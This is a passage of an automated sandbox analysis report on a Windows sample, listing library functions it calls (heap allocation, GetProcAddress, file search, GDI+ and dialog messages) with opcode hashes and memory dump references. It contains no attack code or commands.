                                                          • Instruction ID: 847a0141f58d7e863828dc227156554b9bfdde012110f560d59b5ea8b7144484
                                                          • Opcode Fuzzy Hash: a2b76208f34996ffecbc22f86eab349677401000b3a7c1ed20d195610a2c6af0
                                                          • Instruction Fuzzy Hash: AB41C971D446589ADB20EB62CC55BEAB7ACBF40344F4804EAE14A97083EB785FC5EF10
                                                          Function 00FB13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB13E1
                                                            • Part of subcall function 00FB5E37: __EH_prolog.LIBCMT ref: 00FB5E3C
                                                            • Part of subcall function 00FBCE40: __EH_prolog.LIBCMT ref: 00FBCE45
                                                            • Part of subcall function 00FBB505: __EH_prolog.LIBCMT ref: 00FBB50A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: cac7179910b0fc170d9d7a294c8459fd0ffa84f5b84e51c3978c218567637d74
                                                          • Instruction ID: 5ed7d40e3782d6d61d1fc1cbfe63875bc0da34213587e93b6105d25810109da7
                                                          • Opcode Fuzzy Hash: cac7179910b0fc170d9d7a294c8459fd0ffa84f5b84e51c3978c218567637d74
                                                          • Instruction Fuzzy Hash: E34169B0905B41DEE724CF3A8885AE6FAE5BB19310F50492ED5FE83282CB356654DB10
                                                          Function 00FB13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB13E1
                                                            • Part of subcall function 00FB5E37: __EH_prolog.LIBCMT ref: 00FB5E3C
                                                            • Part of subcall function 00FBCE40: __EH_prolog.LIBCMT ref: 00FBCE45
                                                            • Part of subcall function 00FBB505: __EH_prolog.LIBCMT ref: 00FBB50A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: b37015569c5f6d8885f52281e75c7f99dace36868b418484ed1128595c9d917f
                                                          • Instruction ID: 4eca5e5014d8b85795109483c35cf14b273c717165a455c7efe794fd957af0c3
                                                          • Opcode Fuzzy Hash: b37015569c5f6d8885f52281e75c7f99dace36868b418484ed1128595c9d917f
                                                          • Instruction Fuzzy Hash: 344177B0905B40DEE724CF3A8885AE6FBE5BF19310F404A2ED5FE83282CB356654DB10
                                                          Function 00FCB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FCB098
                                                            • Part of subcall function 00FB13DC: __EH_prolog.LIBCMT ref: 00FB13E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 775d30f5c0677d7816efd4629145db097d54a148bc86c0a4dbab1205e7db0f07
                                                          • Instruction ID: 15113fb3b4622fdee458dfbe921b2cd89a2e5f71a153542919dfc82cfe79c531
                                                          • Opcode Fuzzy Hash: 775d30f5c0677d7816efd4629145db097d54a148bc86c0a4dbab1205e7db0f07
                                                          • Instruction Fuzzy Hash: 3C318F75D0024ADECF15DFA5CD52AEEB7B4AF09300F54449EE409B7242D739AE04EB61
                                                          Function 00FDAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00FDACF8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID:
                                                          • API String ID: 190572456-0
                                                          • Opcode ID: a22b01b74d5a05ed5096dc9b78850612f1daa544e4673bd6fa096b5bc3dae6a6
                                                          • Instruction ID: f19a946f9d8a8e655627f2a6ee5f3146dfee1ba70d923c220e541cf0220b5a31
                                                          • Opcode Fuzzy Hash: a22b01b74d5a05ed5096dc9b78850612f1daa544e4673bd6fa096b5bc3dae6a6
                                                          • Instruction Fuzzy Hash: DF11C633F116299F9B229E28EC8095A7397AB8437071E4222FD25AF354D734DC01B7D6
                                                          Function 00FB9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 3574c1cd47d6ff1a4f9678e2ab499b68168944557c6fde24b556fa2e155bf9c6
                                                          • Instruction ID: e289031ad4783e1548d716b910267c92730360e610ec8dba3df14870a2b690f4
                                                          • Opcode Fuzzy Hash: 3574c1cd47d6ff1a4f9678e2ab499b68168944557c6fde24b556fa2e155bf9c6
                                                          • Instruction Fuzzy Hash: 2101CC33D00525ABCF11AF69CD919DEB775BF88750F054115F915B7152DA78CD00EEA0
                                                          Function 00FDC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FDB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FD9813,00000001,00000364,?,00FD3F73,00000050,?,00FF1030,00000200), ref: 00FDB177
                                                          • _free.LIBCMT ref: 00FDC4E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                          • Instruction ID: fe931bda7856ed89bdc602a89602612289965a0c0145df511b3052eb5d3294fd
                                                          • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                          • Instruction Fuzzy Hash: 1301DB736003066BE731CF55DC45A6AFBEEEB85370F29051EE594833C1EA30A905D764
                                                          Function 00FDB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FD9813,00000001,00000364,?,00FD3F73,00000050,?,00FF1030,00000200), ref: 00FDB177
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 64bfe3accff5c2d40908bb556c801924425e5e7aae85ab5a2ebc4cc7f2592cee
                                                          • Instruction ID: acd39d052f0278844f47ff64a53c1ffb29e9fbf66d9bbcbf8cdc53e4c4b60d7b
                                                          • Opcode Fuzzy Hash: 64bfe3accff5c2d40908bb556c801924425e5e7aae85ab5a2ebc4cc7f2592cee
                                                          • Instruction Fuzzy Hash: 8CF0B436905125F7DB216F21AC19F5E374AAB41770B1E8113B8089B390CB24DD01A2E0
                                                          Function 00FD3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00FD3C3F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID:
                                                          • API String ID: 190572456-0
                                                          • Opcode ID: e111612885b0b2b44794d5d91203a46c1835f22837b8e23373489e1405d98318
                                                          • Instruction ID: 6a75f23d3532bc17606baf47ae45d5d649271cead539e3cf4639f76279e5f181
                                                          • Opcode Fuzzy Hash: e111612885b0b2b44794d5d91203a46c1835f22837b8e23373489e1405d98318
                                                          • Instruction Fuzzy Hash: 1CF0EC336102169FCF124E68EC0499A77DBEF41B747184526FB05E7290DB31EB20E791
                                                          Function 00FD8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FDCA2C,00000000,?,00FD6CBE,?,00000008,?,00FD91E0,?,?,?), ref: 00FD8E38
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 089a4547bff87c4b6c35f67e9c2ba21be63fbee5e4252215becf66a70357f1bb
                                                          • Instruction ID: c2c9a03d1aa0ab79a92332def3632ef8535558f3275678367fb23e46a30a10fc
                                                          • Opcode Fuzzy Hash: 089a4547bff87c4b6c35f67e9c2ba21be63fbee5e4252215becf66a70357f1bb
                                                          • Instruction Fuzzy Hash: 75E0E532A0621696D67236E59C08F9B774BDB413F0F1D0213AC489B381CF24CC03BAE0
                                                          Function 00FB5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB5AC2
                                                            • Part of subcall function 00FBB505: __EH_prolog.LIBCMT ref: 00FBB50A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: eb0207ef1b844b783b448549bde33a794ac543f2f9a858515deb41b6c69584a1
                                                          • Instruction ID: d678e3a384407638f0fbcc1e4fbf7464c8a419ee1b71fab712382b5646d06113
                                                          • Opcode Fuzzy Hash: eb0207ef1b844b783b448549bde33a794ac543f2f9a858515deb41b6c69584a1
                                                          • Instruction Fuzzy Hash: 06018130410691DAD725EBB8C942BDDFBA49F94304F54448DA45653283CFB81B09F7A2
                                                          Function 00FB9620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00FB95D6,?,?,?,?,?,00FE2641,000000FF), ref: 00FB963B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: d896180a11343f79eccff0cf99fcb19a83f5677d2ad71dacbcda2d93494a365f
                                                          • Instruction ID: 61446e6033ba574dede106ca825045463a321cad10ebd8d327f28ac09c2763a5
                                                          • Opcode Fuzzy Hash: d896180a11343f79eccff0cf99fcb19a83f5677d2ad71dacbcda2d93494a365f
                                                          • Instruction Fuzzy Hash: 26F0E930885B059FDB308A22C848BD277E96B12331F040B1ED1F283AE0D7A0658DAE40
                                                          Function 00FBA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6C4
                                                            • Part of subcall function 00FBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6F2
                                                            • Part of subcall function 00FBA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6FE
                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FBA598
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                          • String ID:
                                                          • API String ID: 1464966427-0
                                                          • Opcode ID: d948073b42243801df73acbe20f2e262b19b0d889b9d05212930bfc625d964ba
                                                          • Instruction ID: 1efe3561a8a57d94b80831ab47a46d12363955553b090edfbfeb70689bf47006
                                                          • Opcode Fuzzy Hash: d948073b42243801df73acbe20f2e262b19b0d889b9d05212930bfc625d964ba
                                                          • Instruction Fuzzy Hash: 7EF08236408790AACB3257B58D04BCB7B906F1A331F088A49F1FD52196D2795198AF23
                                                          Function 00FC0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 00FC0E3D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ExecutionStateThread
                                                          • String ID:
                                                          • API String ID: 2211380416-0
                                                          • Opcode ID: 5baa11a15a2a6d55a520d7ff5d8a18a6b9c13c0ad7ef8e63cd98420177c4c25b
                                                          • Instruction ID: eda79b27d192e305b7b99daa07703dcefc3ea30e69485c2f0c4a69bdb8c2abf3
                                                          • Opcode Fuzzy Hash: 5baa11a15a2a6d55a520d7ff5d8a18a6b9c13c0ad7ef8e63cd98420177c4c25b
                                                          • Instruction Fuzzy Hash: 5AD05B11E4109A96DB1137296E5BFFE390A9FD7321F0D006DF1459B293CE5C4C87B661
                                                          Function 00FCA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GdipAlloc.GDIPLUS(00000010), ref: 00FCA62C
                                                            • Part of subcall function 00FCA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FCA3DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                          • String ID:
                                                          • API String ID: 1915507550-0
                                                          • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                          • Instruction ID: 3c873bde13c80d0676c8e0ccd2f44340054d437e046afc00e5ce0c4c113b446c
                                                          • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                          • Instruction Fuzzy Hash: A0D0A77120020E76DF01AB618E13F7E7595EB00344F008029B842C5141EAB1ED10B552
                                                          Function 00FCE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • DloadProtectSection.DELAYIMP ref: 00FCE5E3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: DloadProtectSection
                                                          • String ID:
                                                          • API String ID: 2203082970-0
                                                          • Opcode ID: 0a36dc920505210e57d8c0ca5bf1bc4491eb79983da68f3a67e178d1e90fbee2
                                                          • Instruction ID: 0ea49795844e900cfa8bdfc6c4d88bbec0fbded9ddfee3ec417b45770e6ece1a
                                                          • Opcode Fuzzy Hash: 0a36dc920505210e57d8c0ca5bf1bc4491eb79983da68f3a67e178d1e90fbee2
                                                          • Instruction Fuzzy Hash: 0BD022B04402868BC729EBB89B83F053B54B320B14F88080CF3C4D6088CB7D4080FB01
                                                          Function 00FCDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00FC1B3E), ref: 00FCDD92
                                                            • Part of subcall function 00FCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FCB579
                                                            • Part of subcall function 00FCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCB58A
                                                            • Part of subcall function 00FCB568: IsDialogMessageW.USER32(00010444,?), ref: 00FCB59E
                                                            • Part of subcall function 00FCB568: TranslateMessage.USER32(?), ref: 00FCB5AC
                                                            • Part of subcall function 00FCB568: DispatchMessageW.USER32(?), ref: 00FCB5B6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
